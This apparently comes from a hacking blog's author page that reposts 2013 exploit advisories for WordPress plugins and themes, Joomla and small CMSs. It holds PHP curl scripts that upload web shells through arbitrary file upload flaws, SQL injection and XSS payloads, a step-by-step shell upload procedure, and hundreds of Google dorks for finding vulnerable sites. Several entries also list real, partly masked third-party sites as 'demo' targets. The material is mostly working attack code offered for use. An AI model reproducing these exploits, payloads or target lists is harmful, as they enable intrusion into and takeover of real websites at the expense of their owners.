1337mir

About 1337mir

This author has not yet filled in any details.
So far 1337mir has created 49 entries.
  • wordpress exploits, webapps exploits, wordpress vulnerability, 1337mir
    Permalink wordpress exploits, webapps exploits, wordpress vulnerability, 1337mirGallery

    WordPress Blogfolio Theme Arbitrary File Upload Vulnerability

WordPress Blogfolio Theme Arbitrary File Upload Vulnerability

By |January 3rd, 2014|

Title : WordPress Blogfolio Theme Arbitrary File Upload Vulnerability
Author : eX-Sh1Ne
Date : 23/11/2013
Category : Web Applications
Type : PHP
Vendor : http://themify.me/
Download : http://themify.me/themes/blogfolio
Tested : Mozila, Chrome-> Windows
Vulnerabillity : Arbitrary File Upload
Dork : inurl:wp-content/themes/blogfolio/

Exploit:
< ? p h p $uploadfile=”sh1ne.php”; $ch = curl_init(“http://127.0.0.1/wp-content/themes/blogfolio/themify/themify-ajax.php?upload=1″); curl_setopt($ch, CURLOPT_POST, true); curl_setopt($ch, CURLOPT_POSTFIELDS, array(‘Filedata’=>”@$uploadfile”));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
$postResult = curl_exec($ch);
curl_close($ch);
print “$postResult”;
?>
Shell Access
http://127.0.0.1/[PATH]/wp-content/themes/blogfolio/uploads/sh1ne.php
or
http://127.0.0.1/[PATH]/wp-content/uploads/[years]/[month]/ > […]

Comments Off on WordPress Blogfolio Theme Arbitrary File Upload Vulnerability
  • wordpress exploits, webapps exploits, wordpress vulnerability, 1337mir
    Permalink wordpress exploits, webapps exploits, wordpress vulnerability, 1337mirGallery

    WordPress dzs-videogallery Plugins Remote File Upload Vulnerability

WordPress dzs-videogallery Plugins Remote File Upload Vulnerability

By |January 3rd, 2014|

Exploit Title: WordPress dzs-videogallery Plugins Remote File Upload Vulnerability
Author: iskorpitx
Date: 22/11/2013
Vendor Homepage: http://digitalzoomstudio.net
Themes Link: http://digitalzoomstudio.net/docs/wpvideogallery/
Infected File: upload.php
Category: webapps
Google dork: inurl:/wp-content/plugins/dzs-videogallery/
Tested on : Windows/Linux
< ? p h p $uploadfile=””; $ch = curl_init(“http://127.0.0.1/wp-content/plugins/dzs-videogallery/admin/dzsuploader/upload.php”); curl_setopt($ch, CURLOPT_POST, true); curl_setopt($ch, CURLOPT_POSTFIELDS, array(‘file_field’=>”@$uploadfile”));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
$postResult = curl_exec($ch); curl_close($ch);
print “$postResult”;
?>
uploaded file:
http://127.0.0.1/wp-content/plugins/dzs-videogallery/admin/dzsuploader/upload/upload.html

Comments Off on WordPress dzs-videogallery Plugins Remote File Upload Vulnerability
  • WordPress-Complete-Gallery-Manager-3.3.3-File-Upload-Vulnerability
    Permalink WordPress-Complete-Gallery-Manager-3.3.3-File-Upload-VulnerabilityGallery

    WP page-flip-image-gallery plugins Remote File Upload Vulnerability

WP page-flip-image-gallery plugins Remote File Upload Vulnerability

By |January 3rd, 2014|

Exploit Title: WordPress page-flip-image-gallery plugins Remote File Upload Vulnerability
Author: Ashiyane Digital Security Team
Date: 12/06/2013
Vendor Homepage: http://pageflipgallery.com
Software Link : http://downloads.wordpress.org/plugin/page-flip-image-gallery.zip
Google dork: inurl:/wp-content/plugins/page-flip-image-gallery/
Tested on: Windows/Linux

1)Exploit :
< ? p h p $ uploadfile=”file.php”; $ ch = curl_init(” http://127.0.0.1/wp-content/plugins/page-flip-image-gallery/upload.php”); curl_setopt($ch, CURLOPT_POST, true); curl_setopt($ch, CURLOPT_POSTFIELDS, array(‘orange_themes’=>”@$uploadfile”)); curl_setopt($ch,
CURLOPT_RETURNTRANSFER, 1);
$postResult = curl_exec($ch);
curl_close($ch); print “$postResult”;
?>
2) Exploit demo :
http://arcticpackXging.com/wp-content/plugins/page-flip-image-gallery/upload.php
http://www.panvXlkargroup.org/wp-content/plugins/page-flip-image-gallery/upload.php
http://www.jamXma.it/wp-content/plugins/page-flip-image-gallery/upload.php
http://www.icipiXi.ie/suiomh/wp-content/plugins/page-flip-image-gallery/upload.php
uploaded file:
http://[Target]/wp-content/uploads/file.php

Comments Off on WP page-flip-image-gallery plugins Remote File Upload Vulnerability

Imaweb SQL injection Vulnerability

By |December 30th, 2013|

Exploit Title : imaweb SQL injection vulnerability
Exploit Author : Ashiyane Digital Security Team
Vendor Homepage : http://www.imaweb.fr
Google Dork : intext:Réalisation du site Internet par Imaweb
Date: 2013-12-25
Tested on: Windows 7
discovered by : ACC3SS

Location :
localhost/public/index.php?act=photo_afficher&code=pub_phototheque2&num=[Sql
Injection]
Demo:
http://www.avajaXXn.fr/public/index.php?act=photo_afficher&code=pub_phototheque2&num=1+union+select+1,2,version(
),4,5,6,7–

http://www.auzXay.fr//public/index.php?act=photo_afficher&code=pub_phototheque2&num=1+union+select+1,2,version()
,4,5,6,7–

http://www.roumeXgoux.fr/public/index.php?act=photo_afficher&code=pub_phototheque2&num=1+union+select+1,2,versio
n(),4,5,6,7–

http://www.oxygXeneinsertion.fr/public/index.php?act=photo_afficher&code=pub_phototheque2&num=1+union+select+1,2
,version(),4,5,6,7–

http://www.petXersbach.fr//public/index.php?act=photo_afficher&code=pub_phototheque2&num=1+union+select+1,2,vers
ion(),4,5,6,7–

Comments Off on Imaweb SQL injection Vulnerability

joomla com_joomleague execute arbitrary PHP code Exploit

By |November 4th, 2013|

Exploit Title: joomla com_joomleague execute arbitrary PHP code Exploit
Google Dork: inurl:com_joomleague
Date: [01-11-2013]
Exploit Author: wantexz
Vendor Homepage: http://www.joomleague.net/
Software Link: http://www.joomleague.net/index.php?option=com_jdownloads&Itemid=104&view=viewdownload&catid=2359&cid=242&lang=en
Version: com_joomleague
Tested on: [wantexz]
CVE :
target tested: http://badminton.loiret.free.fr//components/com_joomleague/assets/classes/open-flash-chart/ofc_upload_image.php

POC: 
<?php
$options = getopt(‘u:f:’);

if(!isset($options[‘u’], $options[‘f’]))
die(“\n Usage example: php IDC.php -u http://target.com/ -f IDC.php\n
-u http://target.com/ The full path to Joomla!
-f IDC.php The name of the file to create.\n”);

$url = $options[‘u’];
$file = $options[‘f’];
$shell = […]

Comments Off on joomla com_joomleague execute arbitrary PHP code Exploit

Catmis Sql Injection Vulnerability

By |November 4th, 2013|

Exploit Title : Catmis Sql Injection Vulnerability
Exploit Author : Ashiyane Digital Security Team
Vendor Homepage : http://code.google.com/p/catmis/
Google Dork : inurl:blog/blog.php?blogId=1 inurl:categoryId=
Date: 2013/11/102

Tested on: Windows 7 , Linux
——————————————————————-
Exploit : Sql Injection
Location : [Target]/www.scienceathome.org/blog/blog.php?blogId=1&categoryId=-1&page=[Sql Injection]
Proof:
http://www.scienceathoXXme.org/blog/blog.php?blogId=1&categoryId=-1&page=’
https://www.vidensbXXroend.dk/blog/blog.php?blogId=1&categoryId=-1&page=’
http://www.geigerXXrecords.dk/blog/blog.php?blogId=1&categoryId=3&page=’
http://solikedorXXian.dk/blog/blog.php?blogId=1&categoryId=1&page=’
http://www.krXweb.dk/blog/blog.php?blogId=1&categoryId=1&page=’

Comments Off on Catmis Sql Injection Vulnerability

Google Dorks For SQL Injection

By |October 10th, 2013|

1500+ google Dorks for sql injection.
Definition of google dorks: Advanced Google searches used to find security loopholes on websites and allow hackers to break in to or disrupt the site.

list below:

allinurl:*.php?txtCodiInfo=
inurl:read.php?=
inurl:”ViewerFrame?Mode=”
inurl:index.php?id=

inurl:trainers.php?id=
inurl:buy.php?category=
inurl:article.php?ID=
inurl:play_old.php?id=
inurl:declaration_more.php?decl_id=
inurl:pageid=

inurl:games.php?id=
inurl:page.php?file=
inurl:newsDetail.php?id=
inurl:gallery.php?id=
inurl:article.php?id=
inurl:show.php?id=
inurl:staff_id=
inurl:newsitem.php?num=
inurl:readnews.php?id=
inurl:top10.php?cat=
inurl:historialeer.php?num=
inurl:reagir.php?num=
inurl:Stray-Questions-View.php?num=
inurl:forum_bds.php?num=
inurl:game.php?id=
inurl:view_product.php?id=
inurl:newsone.php?id=
inurl:sw_comment.php?id=
inurl:news.php?id=
inurl:avd_start.php?avd=
inurl:event.php?id=
inurl:product-item.php?id=
inurl:sql.php?id=
inurl:news_view.php?id=
inurl:select_biblio.php?id=
inurl:humor.php?id=
inurl:aboutbook.php?id=
inurl:ogl_inet.php?ogl_id=
inurl:fiche_spectacle.php?id=
inurl:communique_detail.php?id=
inurl:sem.php3?id=
inurl:kategorie.php4?id=
inurl:news.php?id=
inurl:index.php?id=
inurl:faq2.php?id=
inurl:show_an.php?id=
inurl:preview.php?id=
inurl:loadpsb.php?id=
inurl:opinions.php?id=
inurl:spr.php?id=
inurl:pages.php?id=
inurl:announce.php?id=
inurl:clanek.php4?id=
inurl:participant.php?id=
inurl:download.php?id=
inurl:main.php?id=
inurl:review.php?id=
inurl:chappies.php?id=
inurl:prod_detail.php?id=
inurl:viewphoto.php?id=
inurl:article.php?id=
inurl:person.php?id=
inurl:productinfo.php?id=
inurl:showimg.php?id=
inurl:view.php?id=
inurl:website.php?id=
inurl:hosting_info.php?id=
inurl:gallery.php?id=
inurl:rub.php?idr=
inurl:view_faq.php?id=
inurl:artikelinfo.php?id=
inurl:detail.php?ID=
inurl:index.php?=
inurl:profile_view.php?id=
inurl:category.php?id=
inurl:publications.php?id=
inurl:fellows.php?id=
inurl:downloads_info.php?id=
inurl:prod_info.php?id=
inurl:shop.php?do=part&id=
inurl:productinfo.php?id=
inurl:collectionitem.php?id=
inurl:band_info.php?id=
inurl:product.php?id=
inurl:releases.php?id=
inurl:ray.php?id=
inurl:produit.php?id=
inurl:pop.php?id=
inurl:shopping.php?id=
inurl:productdetail.php?id=
inurl:post.php?id=
inurl:viewshowdetail.php?id=
inurl:clubpage.php?id=
inurl:memberInfo.php?id=
inurl:section.php?id=
inurl:theme.php?id=
inurl:page.php?id=
inurl:shredder-categories.php?id=
inurl:tradeCategory.php?id=
inurl:product_ranges_view.php?ID=
inurl:shop_category.php?id=
inurl:transcript.php?id=
inurl:channel_id=
inurl:item_id=
inurl:newsid=
inurl:trainers.php?id=
inurl:news-full.php?id=
inurl:news_display.php?getid=
inurl:index2.php?option=
inurl:readnews.php?id=
inurl:top10.php?cat=
inurl:newsone.php?id=
inurl:event.php?id=
inurl:product-item.php?id=
inurl:sql.php?id=
inurl:aboutbook.php?id=
inurl:preview.php?id=
inurl:loadpsb.php?id=
inurl:pages.php?id=
inurl:material.php?id=
inurl:clanek.php4?id=
inurl:announce.php?id=
inurl:chappies.php?id=
inurl:read.php?id=
inurl:viewapp.php?id=
inurl:viewphoto.php?id=
inurl:rub.php?idr=
inurl:galeri_info.php?l=
inurl:review.php?id=
inurl:iniziativa.php?in=
inurl:curriculum.php?id=
inurl:labels.php?id=
inurl:story.php?id=
inurl:look.php?ID=
inurl:newsone.php?id=
inurl:aboutbook.php?id=
inurl:material.php?id=
inurl:opinions.php?id=
inurl:announce.php?id=
inurl:rub.php?idr=
inurl:galeri_info.php?l=
inurl:tekst.php?idt=
inurl:newscat.php?id=
inurl:newsticker_info.php?idn=
inurl:rubrika.php?idr=
inurl:rubp.php?idr=
inurl:offer.php?idf=
inurl:art.php?idm=
inurl:title.php?id=
intitle:axis intitle:”video server”
inurl:indexFrame.shtml Axis
?intitle:index.of? mp3 artist-name-here
“intitle:index of”
inurl:index.php?id=
inurl:trainers.php?id=
inurl:buy.php?category=
inurl:article.php?ID=
inurl:play_old.php?id=
inurl:declaration_more.php?decl_id=
inurl:Pageid=
inurl:games.php?id=
inurl:page.php?file=
inurl:newsDetail.php?id=
inurl:gallery.php?id=
inurl:article.php?id=
inurl:show.php?id=
inurl:staff_id=
inurl:newsitem.php?num=
inurl:readnews.php?id=
inurl:top10.php?cat=
inurl:historialeer.php?num=
inurl:reagir.php?num=
inurl:forum_bds.php?num=
inurl:game.php?id=
inurl:view_product.php?id=
inurl:newsone.php?id=
inurl:sw_comment.php?id=
inurl:news.php?id=
inurl:avd_start.php?avd=
inurl:event.php?id=
inurl:product-item.php?id=
inurl:sql.php?id=
inurl:news_view.php?id=
inurl:select_biblio.php?id=
inurl:humor.php?id=
inurl:aboutbook.php?id=
inurl:fiche_spectacle.php?id=
inurl:communique_detail.php?id=
inurl:sem.php3?id=
inurl:kategorie.php4?id=
inurl:news.php?id=
inurl:index.php?id=
inurl:faq2.php?id=
inurl:show_an.php?id=
inurl:preview.php?id=
inurl:loadpsb.php?id=
inurl:opinions.php?id=
inurl:spr.php?id=
inurl:pages.php?id=
inurl:announce.php?id=
inurl:clanek.php4?id=
inurl:participant.php?id=
inurl:download.php?id=
inurl:main.php?id=
inurl:review.php?id=
inurl:chappies.php?id=
inurl:read.php?id=
inurl:prod_detail.php?id=
inurl:viewphoto.php?id=
inurl:article.php?id=
inurl:person.php?id=
inurl:productinfo.php?id=
inurl:showimg.php?id=
inurl:view.php?id=
inurl:website.php?id=
inurl:hosting_info.php?id=
inurl:gallery.php?id=
inurl:rub.php?idr=
inurl:view_faq.php?id=
inurl:artikelinfo.php?id=
inurl:detail.php?ID=
inurl:index.php?=
inurl:profile_view.php?id=
inurl:category.php?id=
inurl:publications.php?id=
inurl:fellows.php?id=
inurl:downloads_info.php?id=
inurl:prod_info.php?id=
inurl:shop.php?do=part&id=
inurl:Productinfo.php?id=
inurl:collectionitem.php?id=
inurl:band_info.php?id=
inurl:product.php?id=
inurl:releases.php?id=
inurl:ray.php?id=
inurl:produit.php?id=
inurl:pop.php?id=
inurl:shopping.php?id=
inurl:productdetail.php?id=
inurl:post.php?id=
inurl:viewshowdetail.php?id=
inurl:clubpage.php?id=
inurl:memberInfo.php?id=
inurl:section.php?id=
inurl:theme.php?id=
inurl:page.php?id=
inurl:shredder-categories.php?id=
inurl:tradeCategory.php?id=
inurl:product_ranges_view.php?ID=
inurl:shop_category.php?id=
inurl:transcript.php?id=
inurl:channel_id=
inurl:item_id=
inurl:newsid=
inurl:trainers.php?id=
inurl:news-full.php?id=
inurl:news_display.php?getid=
inurl:index2.php?option=
inurl:readnews.php?id=
inurl:top10.php?cat=
inurl:newsone.php?id=
inurl:event.php?id=
inurl:product-item.php?id=
inurl:sql.php?id=
inurl:aboutbook.php?id=
inurl:review.php?id=
inurl:loadpsb.php?id=
inurl:ages.php?id=
inurl:material.php?id=
inurl:clanek.php4?id=
inurl:announce.php?id=
inurl:chappies.php?id=
inurl:read.php?id=
inurl:viewapp.php?id=
inurl:viewphoto.php?id=
inurl:rub.php?idr=
inurl:galeri_info.php?l=
inurl:review.php?id=
inurl:iniziativa.php?in=
inurl:curriculum.php?id=
inurl:labels.php?id=
inurl:story.php?id=
inurl:look.php?ID=
inurl:newsone.php?id=
inurl:aboutbook.php?id=
inurl:material.php?id=
inurl:opinions.php?id=
inurl:announce.php?id=
inurl:rub.php?idr=
inurl:galeri_info.php?l=
inurl:tekst.php?idt=
inurl:newscat.php?id=
inurl:newsticker_info.php?idn=
inurl:rubrika.php?idr=
inurl:rubp.php?idr=
inurl:offer.php?idf=
inurl:art.php?idm=
inurl:title.php?id=
inurl:”id=” & intext:”Warning: mysql_fetch_assoc()
inurl:”id=” & intext:”Warning: mysql_fetch_array()
inurl:”id=” & intext:”Warning: mysql_num_rows()
inurl:”id=” & intext:”Warning: session_start()
inurl:”id=” & intext:”Warning: getimagesize()
inurl:”id=” & intext:”Warning: […]

Comments Off on Google Dorks For SQL Injection

WordPress fgallery plus Plugin Xss vulnerabilities

By |October 10th, 2013|

Exploit Title : WordPress fgallery plus Plugin Xss vulnerabilities
Author : Iranian Exploit DataBase
Discovered By : IeDb
Email : [email protected]
Home : http://iedb.ir – http://iedb.ir/acc
Software Link : http://wordpress.org/
Security Risk : High
Tested on : Linux
Dork : inurl:/plugins/fgallery_plus/
Exploit :
http://sXXom/wp-content/plugins/fgallery_plus/fim_rss.php?album=[Xss]
Dem0 :

http://alXXdk/wp-content/plugins/fgallery_plus/fim_rss.php?album=3[xss]
http://www.quiolikeoooh.com/quio/wp-content/plugins/fgallery/fim_rss.php?album=3[xss]
Tnx To : TaK.FaNaR – l4tr0d3ctism – r3d_s0urc3 – Bl4ck M4n – Medrik – Dj.TiniVini –
dr.koderz – z3r0 – Mr Zer0
B3hz4d […]

Comments Off on WordPress fgallery plus Plugin Xss vulnerabilities

WordPress Lazy SEO plugin Shell Upload Vulnerability

By |October 10th, 2013|

exploit Title : WordPress Lazy SEO plugin Shell Upload Vulnerability
Exploit Author : Ashiyane Digital Security Team
Discovered By : ACC3SS
Google Dork: : inurl:/wp-content/plugins/lazy-seo/
Date: 2013/09/21
Vendor Homepage : http://wordpress.org/plugins/lazy-seo
Software Link : http://downloads.wordpress.org/plugin/lazy-seo.1.1.9.zip
Version : 1.1.9
Tested on: Windows

Location:
Site/wp-content/plugins/lazy-seo/lazyseo.php
1.Go to address : Site/wp-content/plugins/lazy-seo/lazyseo.php
2.Click on Browse…
3.Select Shell Code
3.Complete the fields
4.Press Enter
5.Shell Address : wp-content/plugins/lazy-seo/Shell.php

Demo:
http://www.dXus.com/wp-content/plugins/lazy-seo/lazyseo.php
http://noteclX.com/wp-content/plugins/lazy-seo/lazyseo.php

Comments Off on WordPress Lazy SEO plugin Shell Upload Vulnerability

Actualizer CMS – Multiple Vulnerabilities

By |October 10th, 2013|

Title: Actualizer CMS – Multiple Vulnerabilities
Date: 22.09.2013
Tested on: Linux 3.0 – 3.9 (95%)
Vendor: actualizer.pl
Dork: intext:”Powered by Actualizer & Heuristic”
Contact: [email protected]

1. Blind SQL Injection
host/galeria/galeria-2 /gal,1 ‘%20or%20’1’=’2.html – false
host/galeria/galeria-2/gal,1 ‘%20or%20’1 ‘= ‘ 1. html – true
PoC:
http://site/galeria/galeria-2/gal,1 ‘%20or%20 ‘1’=’ 2. html
2. Cross Site Scripting
host/katalog/nowosci/archiwum/year,”xss
PoC:
site/katalog/nowosci/archiwum/year,”xss
3. Full Path Disclosure
host/newsletter.php
POST: action=save&cat=666%email[][email protected]&imie=devil

host/konto/rejestracja
POST (multipart): login=1

Comments Off on Actualizer CMS – Multiple Vulnerabilities